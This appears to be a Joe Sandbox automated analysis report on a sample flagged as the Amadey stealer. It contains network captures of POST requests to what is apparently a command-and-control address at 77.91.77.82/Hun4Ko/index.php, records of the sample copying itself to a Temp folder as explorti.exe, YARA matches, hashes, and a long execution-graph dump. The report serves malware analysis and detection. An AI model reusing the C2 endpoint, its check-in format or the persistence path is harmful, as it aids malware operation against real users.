                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  30192.168.2.44976777.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:12:03.692563057 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination Port
                  31192.168.2.44976877.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:12:06.145739079 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  32192.168.2.44976977.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:12:06.270699024 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:15:08:00
                  Start date:26/07/2024
                  Path:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Jl5yg1Km2s.exe"
                  Imagebase:0xa00000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1762264441.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:15:08:06
                  Start date:26/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                  Imagebase:0x7ff7699e0000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 79%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:6
                  Start time:15:09:00
                  Start date:26/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Imagebase:0x3e0000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 054302D7 Relevance: .1, Instructions: 95COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f78c420b7f6b5b1554c22e65cc9c61f8061bbe58cfa3ca236970af2c296e120
                    • Instruction ID: 97111f242b722a74347ed6eaa806b9aca09074d24c4d4a64118943c352e2068e
                    • Opcode Fuzzy Hash: 9f78c420b7f6b5b1554c22e65cc9c61f8061bbe58cfa3ca236970af2c296e120
                    • Instruction Fuzzy Hash: 8E011BEF14C1107EB242D1826B1DAFB676EE6DA730730893BF40AC1512E2984E4F2135
                    Function 054302DC Relevance: .1, Instructions: 96COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c14ad8aba9dc4510d96d72bf481cf72550b609125c811e695cf7988b3259e23
                    • Instruction ID: e3fb639096a7cdea1b14751139f122bdfeb9ca0068e574326ccb1ed54995bbe0
                    • Opcode Fuzzy Hash: 7c14ad8aba9dc4510d96d72bf481cf72550b609125c811e695cf7988b3259e23
                    • Instruction Fuzzy Hash: 6A111CEB14D110BEF241C1816B19AF6676EE7DA730731892BF44AC1512E2984E4E5131
                    Function 0543035E Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7e702bb107a25b7e0880df472e47696d26e73466ca80691c6861c373f8792c2
                    • Instruction ID: dc0473edfb7aa89818da73114327cd186de91b1e0376838a3be12c304952c4aa
                    • Opcode Fuzzy Hash: a7e702bb107a25b7e0880df472e47696d26e73466ca80691c6861c373f8792c2
                    • Instruction Fuzzy Hash: C0010CEB55D1107EB242D1827B1DAFB576EE6CAB70331C92BF44AD0412E2980E4E1131
                    Function 0543032A Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ce965dbf3a5bf30e79f6978c82960873f6981c0c6df30972c5799a388e9426f4
                    • Instruction ID: 93df522fdbccc57bf8af9257b897fec7d5de138e8ade5437b80769d81e292b49
                    • Opcode Fuzzy Hash: ce965dbf3a5bf30e79f6978c82960873f6981c0c6df30972c5799a388e9426f4
                    • Instruction Fuzzy Hash: 3E011BEB54D1547EF242D1912B19AFA6B6EE6CA730331897BF446C1412E2980E4F6131
                    Function 054302FF Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70b5a2e38359479692a056433bec02c3748cbea93f147504fa106c5098baabbd
                    • Instruction ID: afe850499a8e748b8cf9d3dfcb3dd5d6a4a204de6d9b89f090d9228c944c0729
                    • Opcode Fuzzy Hash: 70b5a2e38359479692a056433bec02c3748cbea93f147504fa106c5098baabbd
                    • Instruction Fuzzy Hash: 80012DEB54D1107EF251C1817B1DAFB5B6EE6CA7303318A3BF44AC5452E2984E4F2131
                    Function 05430319 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e10808abdea10b216994cd48268698677b92ce468e12d7bced9e728bbcb4b3c
                    • Instruction ID: 14a83472529d7c5600b5e5e8ca0c8e9568579d462f08ebc3c0cfaf8ee3d958c3
                    • Opcode Fuzzy Hash: 8e10808abdea10b216994cd48268698677b92ce468e12d7bced9e728bbcb4b3c
                    • Instruction Fuzzy Hash: 9501DAEF55D1107EB241D1827B1DAFB5B6EE6DAB70331C93BF80AD1412E2984E4E2131
                    Function 05430378 Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1763863934.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5430000_Jl5yg1Km2s.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5fa1260e1e60bb24a95707b3cfad5dfc17fdeb0d707ba81b6e8d807700abec76
                    • Instruction ID: b083c221786d5e6410df36dd4a42491ce525986f0e51de58d8a7272f38f43a5d
                    • Opcode Fuzzy Hash: 5fa1260e1e60bb24a95707b3cfad5dfc17fdeb0d707ba81b6e8d807700abec76
                    • Instruction Fuzzy Hash: 58E092BB10C110AEE241C082674DAFA6B2FE7DA3313308627F446C1011D198498F5130

                    Execution Graph

                    Execution Coverage:6.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:7.1%
                    Total number of Nodes:621
                    Total number of Limit Nodes:44
                    execution_graph 13162 3fb7b9 13163 3fb6b5 11 API calls 13162->13163 13164 3fb7e1 Concurrency::details::_Reschedule_chore 13163->13164 13165 3fb806 13164->13165 13169 3fcab1 13164->13169 13167 3fb618 11 API calls 13165->13167 13168 3fb81e 13167->13168 13170 3fcacf 13169->13170 13171 3fcabf TpCallbackUnloadDllOnCompletion 13169->13171 13170->13165 13171->13170 12444 416bcb 12445 416bd7 12444->12445 12456 418a8f 12445->12456 12447 416c06 12448 416c23 12447->12448 12449 416c15 12447->12449 12464 41689d 12448->12464 12450 416c79 9 API calls 12449->12450 12452 416c1f 12450->12452 12453 416c3d 12455 416c51 __freea 12453->12455 12467 416c79 12453->12467 12457 418a94 __cftof 12456->12457 12460 418a9f 12457->12460 12479 41d4d4 12457->12479 12476 4164fd 12460->12476 12461 41d707 RtlAllocateHeap 12462 41d71a __dosmaperr 12461->12462 12463 418ad2 __cftof 12461->12463 12462->12447 12463->12461 12463->12462 12498 41681a 12464->12498 12466 4168af 12466->12453 12468 416ca4 __cftof 12467->12468 12475 416c87 __cftof __dosmaperr 12467->12475 12469 416ce6 CreateFileW 12468->12469 12470 416cca __cftof __dosmaperr 12468->12470 12471 416d18 12469->12471 12472 416d0a 12469->12472 12470->12455 12548 416d57 12471->12548 12534 416de1 GetFileType 12472->12534 12475->12455 12486 4163d7 12476->12486 12480 41d4e0 __cftof 12479->12480 12481 4164fd __cftof 2 API calls 12480->12481 12482 41d53c __cftof __dosmaperr 12480->12482 12483 41d6ce __cftof 12481->12483 12482->12460 12484 41d707 RtlAllocateHeap 12483->12484 12485 41d71a __dosmaperr 12483->12485 12484->12483 12484->12485 12485->12460 12488 4163e5 __cftof 12486->12488 12487 416430 12487->12463 12488->12487 12491 41643b 12488->12491 12496 41a1a2 GetPEB 12491->12496 12493 416445 12494 41644a GetPEB 12493->12494 12495 41645a __cftof 12493->12495 12494->12495 12497 41a1bc __cftof 12496->12497 12497->12493 12499 41683a 12498->12499 12503 416831 12498->12503 12499->12503 12504 41b49b 12499->12504 12503->12466 12505 416870 12504->12505 12506 41b4ae 12504->12506 12508 41b4c8 12505->12508 12506->12505 12512 41f44b 12506->12512 12509 41b4f0 12508->12509 12510 41b4db 12508->12510 12509->12503 12510->12509 12517 41e551 12510->12517 12514 41f457 __cftof 12512->12514 12513 41f4a6 12513->12505 12514->12513 12515 418a8f __cftof 4 API calls 12514->12515 12516 41f4cb 12515->12516 12518 41e55b 12517->12518 12521 41e469 12518->12521 12520 41e561 12520->12509 12522 41e475 __cftof __freea 12521->12522 12523 418a8f __cftof 4 API calls 12522->12523 12524 41e496 12522->12524 12525 41e508 12523->12525 12524->12520 12526 41e544 12525->12526 12530 41a5ce 12525->12530 12526->12520 12531 41a5f1 12530->12531 12532 418a8f __cftof 4 API calls 12531->12532 12533 41a667 12532->12533 12535 416e1c 12534->12535 12540 416eb2 __dosmaperr 12534->12540 12536 416e36 __cftof 12535->12536 12570 417157 12535->12570 12538 416e55 GetFileInformationByHandle 12536->12538 12536->12540 12539 416e6b 12538->12539 12538->12540 12556 4170a9 12539->12556 12540->12470 12544 416e88 12545 416f51 SystemTimeToTzSpecificLocalTime 12544->12545 12546 416e9b 12545->12546 12547 416f51 SystemTimeToTzSpecificLocalTime 12546->12547 12547->12540 12593 4172f4 12548->12593 12550 416d65 12551 416d6a __dosmaperr 12550->12551 12552 4170a9 4 API calls 12550->12552 12551->12470 12553 416d83 12552->12553 12554 417157 RtlAllocateHeap 12553->12554 12555 416da2 12554->12555 12555->12470 12557 4170bf _wcsrchr 12556->12557 12565 416e77 12557->12565 12574 41b9c4 12557->12574 12559 417103 12560 41b9c4 4 API calls 12559->12560 12559->12565 12561 417114 12560->12561 12562 41b9c4 4 API calls 12561->12562 12561->12565 12563 417125 12562->12563 12564 41b9c4 4 API calls 12563->12564 12563->12565 12564->12565 12566 416f51 12565->12566 12567 416f69 12566->12567 12568 416f89 SystemTimeToTzSpecificLocalTime 12567->12568 12569 416f6f 12567->12569 12568->12569 12569->12544 12571 417170 12570->12571 12573 417184 __dosmaperr 12571->12573 12585 41b548 12571->12585 12573->12536 12576 41b9d2 12574->12576 12578 41b9d8 __cftof __dosmaperr 12576->12578 12579 41ba0d 12576->12579 12577 41ba08 12577->12559 12578->12559 12580 41ba37 12579->12580 12582 41ba1d __cftof __dosmaperr 12579->12582 12581 41681a __cftof 4 API calls 12580->12581 12580->12582 12584 41ba61 12581->12584 12582->12577 12583 41b985 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12583->12584 12584->12582 12584->12583 12586 41b572 __cftof 12585->12586 12588 41b58e __dosmaperr __freea 12586->12588 12589 41d6cf 12586->12589 12588->12573 12592 41d6dc __cftof 12589->12592 12590 41d707 RtlAllocateHeap 12591 41d71a __dosmaperr 12590->12591 12590->12592 12591->12588 12592->12590 12592->12591 12594 417318 12593->12594 12596 41731e 12594->12596 12597 417016 12594->12597 12596->12550 12598 417022 __dosmaperr 12597->12598 12603 41b85b 12598->12603 12600 41703a __dosmaperr 12601 41b85b RtlAllocateHeap 12600->12601 12602 417048 12600->12602 12601->12602 12602->12596 12606 41b6be 12603->12606 12605 41b874 12605->12600 12607 41b6ce 12606->12607 12609 41b6d5 12607->12609 12610 421ed8 12607->12610 12609->12605 12613 421d02 12610->12613 12612 421eef 12612->12609 12614 421d34 12613->12614 12616 421d20 __cftof __dosmaperr 12613->12616 12615 41b548 RtlAllocateHeap 12614->12615 12614->12616 12615->12616 12616->12612 12617 41d6cf 12620 41d6dc __cftof 12617->12620 12618 41d707 RtlAllocateHeap 12619 41d71a __dosmaperr 12618->12619 12618->12620 12620->12618 12620->12619 12818 3eac70 12820 3eadc0 __cftof 12818->12820 12819 3eade6 shared_ptr 12820->12819 12823 3e54e0 12820->12823 12822 3eaf4e 12824 3e5500 12823->12824 12824->12824 12826 3e5600 12824->12826 12827 3e21c0 12824->12827 12826->12822 12830 3e2180 12827->12830 12831 3e2196 12830->12831 12834 418647 12831->12834 12837 417436 12834->12837 12836 3e21a4 12836->12824 12838 417476 12837->12838 12839 41745e __cftof __dosmaperr 12837->12839 12838->12839 12840 41681a __cftof 4 API calls 12838->12840 12839->12836 12841 41748e 12840->12841 12843 4179f1 12841->12843 12845 417a02 12843->12845 12844 417a11 __cftof __dosmaperr 12844->12839 12845->12844 12850 417f95 12845->12850 12855 417bef 12845->12855 12860 417c15 12845->12860 12870 417d63 12845->12870 12851 417fa5 12850->12851 12852 417f9e 12850->12852 12851->12845 12879 41797d 12852->12879 12854 417fa4 12854->12845 12856 417bf8 12855->12856 12857 417bff 12855->12857 12858 41797d 4 API calls 12856->12858 12857->12845 12859 417bfe 12858->12859 12859->12845 12861 417c36 __cftof __dosmaperr 12860->12861 12863 417c1c 12860->12863 12861->12845 12862 417d96 12868 417da4 12862->12868 12869 417db8 12862->12869 12887 41806e 12862->12887 12863->12861 12863->12862 12865 417dcf 12863->12865 12863->12868 12865->12869 12883 4181bd 12865->12883 12868->12869 12891 418517 12868->12891 12869->12845 12871 417d96 12870->12871 12872 417d7c 12870->12872 12873 41806e 4 API calls 12871->12873 12877 417da4 12871->12877 12878 417db8 12871->12878 12872->12871 12874 417dcf 12872->12874 12872->12877 12873->12877 12875 4181bd 4 API calls 12874->12875 12874->12878 12875->12877 12876 418517 4 API calls 12876->12878 12877->12876 12877->12878 12878->12845 12880 41798f __dosmaperr 12879->12880 12881 418959 4 API calls 12880->12881 12882 4179b2 __dosmaperr 12881->12882 12882->12854 12884 4181d8 12883->12884 12885 41820a 12884->12885 12895 41c63f 12884->12895 12885->12868 12888 418087 12887->12888 12902 41d179 12888->12902 12890 41813a 12890->12868 12893 41858a 12891->12893 12894 418534 12891->12894 12892 41c63f __cftof 4 API calls 12892->12894 12893->12869 12894->12892 12894->12893 12898 41c4e4 12895->12898 12897 41c657 12897->12885 12899 41c4f4 12898->12899 12900 41681a __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12899->12900 12901 41c4f9 __cftof __dosmaperr 12899->12901 12900->12901 12901->12897 12903 41d189 __cftof __dosmaperr 12902->12903 12905 41d19f 12902->12905 12903->12890 12904 41d236 12908 41d295 12904->12908 12909 41d25f 12904->12909 12905->12903 12905->12904 12906 41d23b 12905->12906 12915 41c990 12906->12915 12932 41cca9 12908->12932 12911 41d264 12909->12911 12912 41d27d 12909->12912 12921 41cfef 12911->12921 12928 41ce93 12912->12928 12916 41c9a2 12915->12916 12917 41681a __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12916->12917 12918 41c9b6 12917->12918 12919 41cca9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12918->12919 12920 41c9be __alldvrm __cftof __dosmaperr _strrchr 12918->12920 12919->12920 12920->12903 12923 41d01d 12921->12923 12922 41d056 12922->12903 12923->12922 12924 41d08f 12923->12924 12925 41d068 12923->12925 12926 41cd4b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12924->12926 12927 41cf1e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12925->12927 12926->12922 12927->12922 12929 41cec0 12928->12929 12930 41ceff 12929->12930 12931 41cf1e GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12929->12931 12930->12903 12931->12930 12933 41ccc1 12932->12933 12934 41cd26 12933->12934 12935 41cd4b GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12933->12935 12934->12903 12935->12934 12980 3e8690 12981 3e8696 12980->12981 12982 416639 RtlAllocateHeap 12981->12982 12983 3e86a3 12982->12983 12984 3e86b6 12983->12984 12985 4166c7 4 API calls 12983->12985 12986 3e86b0 12985->12986 12936 3f6ab0 12937 3f6ae0 12936->12937 12940 3f4690 12937->12940 12939 3f6b2c Sleep 12939->12937 12943 3f46cb 12940->12943 12957 3f4a42 shared_ptr 12940->12957 12941 3f4e39 shared_ptr 12941->12939 12944 3ebd30 4 API calls 12943->12944 12943->12957 12955 3f4723 shared_ptr __dosmaperr 12944->12955 12945 3f4ef5 shared_ptr 12946 3f4fbe shared_ptr 12945->12946 12950 3f6a86 12945->12950 12967 3e7ce0 12946->12967 12948 3f4fcd 12973 3e8290 12948->12973 12952 3f4690 10 API calls 12950->12952 12951 3f49dd 12953 3ebd30 4 API calls 12951->12953 12951->12957 12954 3f6b2c Sleep 12952->12954 12953->12957 12954->12950 12955->12951 12956 418959 4 API calls 12955->12956 12956->12951 12957->12941 12959 3e6590 12957->12959 12958 3f4fe6 shared_ptr 12958->12939 12960 3e65ef 12959->12960 12961 3e21c0 4 API calls 12960->12961 12962 3e6679 shared_ptr 12961->12962 12963 3e21c0 4 API calls 12962->12963 12964 3e6802 shared_ptr 12962->12964 12966 3e6707 shared_ptr 12963->12966 12964->12945 12965 3e21c0 4 API calls 12965->12966 12966->12964 12966->12965 12969 3e7d46 shared_ptr __cftof 12967->12969 12968 3e7e83 GetNativeSystemInfo 12970 3e7e87 12968->12970 12969->12968 12969->12970 12972 3e7e98 shared_ptr 12969->12972 12970->12972 12977 418a61 12970->12977 12972->12948 12976 3e82f5 shared_ptr __cftof 12973->12976 12974 3e8434 GetNativeSystemInfo 12975 3e8313 12974->12975 12975->12958 12976->12974 12976->12975 12978 4186b7 4 API calls 12977->12978 12979 418a7f 12978->12979 12979->12972 13005 3f86d0 13006 3f872a __cftof 13005->13006 13012 3f9ab0 13006->13012 13008 3f8754 13011 3f876c 13008->13011 13016 3e42f0 13008->13016 13010 3f87d9 std::_Throw_future_error 13013 3f9ae5 13012->13013 13022 3e2be0 13013->13022 13015 3f9b16 13015->13008 13017 3fbddf InitOnceExecuteOnce 13016->13017 13018 3e430a 13017->13018 13019 3e4311 13018->13019 13020 416bcb 9 API calls 13018->13020 13019->13010 13021 3e4324 13020->13021 13023 3e2c1d 13022->13023 13024 3fbddf InitOnceExecuteOnce 13023->13024 13025 3e2c46 13024->13025 13026 3e2c51 13025->13026 13028 3e2c88 13025->13028 13031 3fbdf7 13025->13031 13026->13015 13038 3e2340 13028->13038 13032 3fbe03 std::_Xinvalid_argument 13031->13032 13033 3fbe6a 13032->13033 13034 3fbe73 13032->13034 13041 3fbd7f 13033->13041 13036 3e29e0 10 API calls 13034->13036 13037 3fbe6f 13036->13037 13037->13028 13059 3fb4d6 13038->13059 13040 3e2372 13042 3fcb34 InitOnceExecuteOnce 13041->13042 13043 3fbd97 13042->13043 13044 3fbd9e 13043->13044 13047 416bcb 13043->13047 13044->13037 13046 3fbda7 13046->13037 13048 416bd7 13047->13048 13049 418a8f __cftof 4 API calls 13048->13049 13050 416c06 13049->13050 13051 416c23 13050->13051 13052 416c15 13050->13052 13054 41689d 4 API calls 13051->13054 13053 416c79 9 API calls 13052->13053 13055 416c1f 13053->13055 13056 416c3d 13054->13056 13055->13046 13057 416c79 9 API calls 13056->13057 13058 416c51 __freea 13056->13058 13057->13058 13058->13046 13060 3fb4f1 std::_Xinvalid_argument 13059->13060 13061 418a8f __cftof 4 API calls 13060->13061 13063 3fb558 __cftof 13060->13063 13062 3fb59f 13061->13062 13063->13040 13069 3fa110 13070 3fa190 13069->13070 13076 3f7010 13070->13076 13072 3fa1cc shared_ptr 13073 3fa3be shared_ptr 13072->13073 13080 3e3de0 13072->13080 13075 3fa3a6 13077 3f7051 __cftof __Mtx_init_in_situ 13076->13077 13078 3f7286 13077->13078 13086 3e2dc0 13077->13086 13078->13072 13081 3e3e1e 13080->13081 13082 3e3e48 13080->13082 13081->13075 13083 3e3e58 13082->13083 13129 3e2b00 13082->13129 13083->13075 13087 3e2e06 13086->13087 13091 3e2e6f 13086->13091 13088 3fc5af GetSystemTimePreciseAsFileTime 13087->13088 13089 3e2e12 13088->13089 13092 3e2f1e 13089->13092 13096 3e2e1d __Mtx_unlock 13089->13096 13090 3e2eef 13090->13078 13091->13090 13097 3fc5af GetSystemTimePreciseAsFileTime 13091->13097 13093 3fc16d 10 API calls 13092->13093 13094 3e2f24 13093->13094 13095 3fc16d 10 API calls 13094->13095 13098 3e2eb9 13095->13098 13096->13091 13096->13094 13097->13098 13099 3fc16d 10 API calls 13098->13099 13100 3e2ec0 __Mtx_unlock 13098->13100 13099->13100 13101 3fc16d 10 API calls 13100->13101 13102 3e2ed8 __Cnd_broadcast 13100->13102 13101->13102 13102->13090 13103 3fc16d 10 API calls 13102->13103 13104 3e2f3c 13103->13104 13105 3fc5af GetSystemTimePreciseAsFileTime 13104->13105 13115 3e2f80 shared_ptr __Mtx_unlock 13105->13115 13106 3e30c5 13107 3fc16d 10 API calls 13106->13107 13108 3e30cb 13107->13108 13109 3fc16d 10 API calls 13108->13109 13110 3e30d1 13109->13110 13111 3fc16d 10 API calls 13110->13111 13117 3e3093 __Mtx_unlock 13111->13117 13112 3e30a7 13112->13078 13113 3fc16d 10 API calls 13114 3e30dd 13113->13114 13115->13106 13115->13108 13115->13112 13116 3fc5af GetSystemTimePreciseAsFileTime 13115->13116 13118 3e305f 13116->13118 13117->13112 13117->13113 13118->13106 13118->13110 13118->13117 13120 3fbc4c 13118->13120 13123 3fba72 13120->13123 13122 3fbc5c 13122->13118 13124 3fba9c 13123->13124 13125 3fce6e _xtime_get GetSystemTimePreciseAsFileTime 13124->13125 13127 3fbaa4 __Xtime_diff_to_millis2 13124->13127 13126 3fbacf __Xtime_diff_to_millis2 13125->13126 13126->13127 13128 3fce6e _xtime_get GetSystemTimePreciseAsFileTime 13126->13128 13127->13122 13128->13127 13130 3e2b0e 13129->13130 13136 3fb747 13130->13136 13132 3e2b49 13132->13075 13133 3e2b42 13133->13132 13142 3e2b80 13133->13142 13135 3e2b58 std::_Xinvalid_argument 13137 3fb754 13136->13137 13141 3fb773 Concurrency::details::_Reschedule_chore 13136->13141 13145 3fca7a 13137->13145 13139 3fb764 13139->13141 13147 3fb71e 13139->13147 13141->13133 13153 3fb6fb 13142->13153 13144 3e2bb2 shared_ptr 13144->13135 13146 3fca95 CreateThreadpoolWork 13145->13146 13146->13139 13148 3fb727 Concurrency::details::_Reschedule_chore 13147->13148 13151 3fcccf 13148->13151 13150 3fb741 13150->13141 13152 3fcce4 TpPostWork 13151->13152 13152->13150 13154 3fb717 13153->13154 13155 3fb707 13153->13155 13154->13144 13155->13154 13157 3fc97b 13155->13157 13158 3fc990 TpReleaseWork 13157->13158 13158->13154 13182 3f2df0 13183 3f2e95 __cftof 13182->13183 13184 3f32c2 InternetCloseHandle InternetCloseHandle 13183->13184 13185 3f3301 13184->13185 13186 3ee410 5 API calls 13185->13186 13187 3f33f3 shared_ptr std::_Xinvalid_argument 13186->13187 12742 3fb82e 12747 3fb6b5 12742->12747 12744 3fb856 12755 3fb618 12744->12755 12746 3fb86f 12748 3fb6c1 Concurrency::details::_Reschedule_chore 12747->12748 12749 3fb6f2 12748->12749 12765 3fc5af 12748->12765 12749->12744 12753 3fb6dc __Mtx_unlock 12754 3e2a10 10 API calls 12753->12754 12754->12749 12756 3fb624 Concurrency::details::_Reschedule_chore 12755->12756 12757 3fc5af GetSystemTimePreciseAsFileTime 12756->12757 12759 3fb67e 12756->12759 12758 3fb639 12757->12758 12760 3e2a10 10 API calls 12758->12760 12759->12746 12761 3fb63f __Mtx_unlock 12760->12761 12762 3e2a10 10 API calls 12761->12762 12763 3fb65c __Cnd_broadcast 12762->12763 12763->12759 12764 3e2a10 10 API calls 12763->12764 12764->12759 12773 3fc355 12765->12773 12767 3fb6d6 12768 3e2a10 12767->12768 12769 3e2a1c 12768->12769 12770 3e2a1a 12768->12770 12790 3fc16d 12769->12790 12770->12753 12774 3fc3ab 12773->12774 12776 3fc37d 12773->12776 12774->12776 12779 3fce6e 12774->12779 12776->12767 12777 3fc400 __Xtime_diff_to_millis2 12777->12776 12778 3fce6e _xtime_get GetSystemTimePreciseAsFileTime 12777->12778 12778->12777 12780 3fce7d 12779->12780 12782 3fce8a __aulldvrm 12779->12782 12780->12782 12783 3fce47 12780->12783 12782->12777 12786 3fcaed 12783->12786 12787 3fcafe GetSystemTimePreciseAsFileTime 12786->12787 12788 3fcb0a 12786->12788 12787->12788 12788->12782 12791 3fc195 12790->12791 12792 3fc177 12790->12792 